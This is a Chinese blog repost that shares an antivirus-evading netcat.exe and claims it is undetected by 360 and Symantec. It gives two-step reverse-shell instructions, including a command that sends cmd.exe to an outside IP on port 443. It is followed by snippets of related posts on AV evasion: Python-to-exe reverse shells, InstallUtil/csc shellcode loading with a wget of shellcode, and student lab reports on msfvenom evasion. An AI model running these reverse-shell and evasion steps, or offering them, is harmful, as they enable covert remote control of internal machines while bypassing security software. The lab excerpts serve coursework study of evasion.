分享一个免杀的netcat.exe

GitHub链接:https://github.com/7hmA3s/netcat

免杀情况:

360杀毒/5.0.0.8160   -- 静态扫描和动态执行均免杀

赛门铁克/14.0.3752   -- 静态扫描和动态执行均免杀

反弹shell步骤:

第1步: 外网服务器执行: netcat -l -p 443

第2步: 内网服务器执行: netcat.exe -t -e cmd.exe 136.79.5.226 443

原文地址:https://www.cnblogs.com/dgjnszf/p/11191318.html

时间: 2024-09-27 14:37:02

分享一个免杀的netcat.exe的相关文章

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe.lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell. 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀. 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 第1步:安装Python2.7和Py2exe 一定要安装32位的Python 2.7和32位的P

payload免杀之Installutil.exe&csc.exe利用

0x00 前言 C#的在Windows平台下的编译器名称是Csc.exe.Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等.这两个东西一般情况下是配合使用.所以就不单独拿出来讲了. 0x01 利用过程 1.下载shellcode.cs wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-c

免杀原理与实践

Exp3 免杀原理与实践 一.实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧: 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征码的检测 启发式恶意软件的检测 基于行为的恶意

2018-2019-2 20165330《网络对抗技术》Exp3 免杀原理与实践

目录 基础问题 相关知识 实验内容 实验步骤 实验过程中遇到的问题 离实战还缺些什么技术或步骤? 实验总结与体会 实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 返回目录 基础问题 杀软是如何检测出恶意代码的? 基于特征码:如果一个可执行文件(或其他运行的库.脚本等)包

2018-2019-2 20165114《网络对抗技术》Exp3 免杀原理与实践

Exp3 免杀原理与实践 目录 一.实验内容 二.基础问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 三.实践过程记录 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧: 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 四.实验总结与体会 五.开启杀软能绝对防止电脑中恶意代码吗? 一.实验

20165218 《网络对抗技术》Exp3 免杀原理与实践

Exp3 免杀原理与实践 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用VirusTotal或Viscan网站扫描后门程序 VirusTotal Viscan 免杀工具1--msfvenom使用编码器 - 使用msfvenom命令生成exe文件 msfvenom -p windows/meterpreter/reverse_tcp -e x86shikata_ga_nai -b '\x00'

Exp3 免杀原理和实践

一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串.如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码. (2)启发式恶意软件检测 一般在缺乏精确判定依据时,根据些片面特征去推断是否为恶意软件,比如如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那就把它当成一个恶意软件. (3)基于行为的恶意软件检测 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式. 2.免杀是做什么?

20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践 一.实践内容概述 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. AV软

Exp3 免杀原理与实践 20164314 郭浏聿

一.实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 二.基础问题回答 (1)杀软是如何检测出恶意代码的? 答: ①基于特征码检测:如果一个可执行文件包含一段特征码则被认